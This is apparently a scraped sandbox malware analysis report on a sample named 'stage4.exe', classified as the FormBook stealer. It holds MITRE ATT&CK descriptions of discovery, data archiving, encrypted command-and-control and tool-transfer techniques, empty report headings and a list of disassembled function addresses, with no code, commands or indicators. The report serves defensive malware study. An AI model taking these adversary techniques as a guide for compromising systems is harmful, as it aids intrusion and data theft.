Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report stage4.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Function 012185CA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41
filenativeCOMMON

Function 012185D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Function 01209B30, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Function 0121867C, Relevance: 1.5, APIs: 1, Instructions: 36
filenativeCOMMON

Function 01218680, Relevance: 1.5, APIs: 1, Instructions: 36
filenativeCOMMON

Function 012187AA, Relevance: 1.5, APIs: 1, Instructions: 31
memorynativeCOMMON

Function 012187B0, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Function 01218700, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Function 012188DB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26
memoryCOMMON

Function 012188E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Function 01207280, Relevance: 3.1, APIs: 2, Instructions: 55
threadwindowCOMMON

Function 01207303, Relevance: 3.0, APIs: 2, Instructions: 29
threadwindowCOMMON

Function 012188A0, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Function 01218A40, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Function 01218920, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Function 01218913, Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Function 01208C6C, Relevance: 1.7, Strings: 1, Instructions: 423
COMMONCrypto

Function 01208C70, Relevance: 1.7, Strings: 1, Instructions: 423
COMMONCrypto

Function 01202FB0, Relevance: .4, Instructions: 435
COMMONCrypto

Function 0121BCDD, Relevance: .3, Instructions: 302
COMMONCrypto

Function 0121BF11, Relevance: .2, Instructions: 243
COMMONCrypto

Function 0121CF7D, Relevance: .2, Instructions: 228
COMMONCrypto

Function 0121B8C3, Relevance: .2, Instructions: 203
COMMONCrypto

Function 01202D90, Relevance: .2, Instructions: 165
COMMONCrypto

Function 01202D89, Relevance: .2, Instructions: 161
COMMONCrypto

Function 0121C9A8, Relevance: .2, Instructions: 155
COMMONCrypto

Function 0121C9B9, Relevance: .2, Instructions: 150
COMMONCrypto

Function 01201030, Relevance: .1, Instructions: 108
COMMONCrypto

Function 01201174, Relevance: .1, Instructions: 96
COMMONCrypto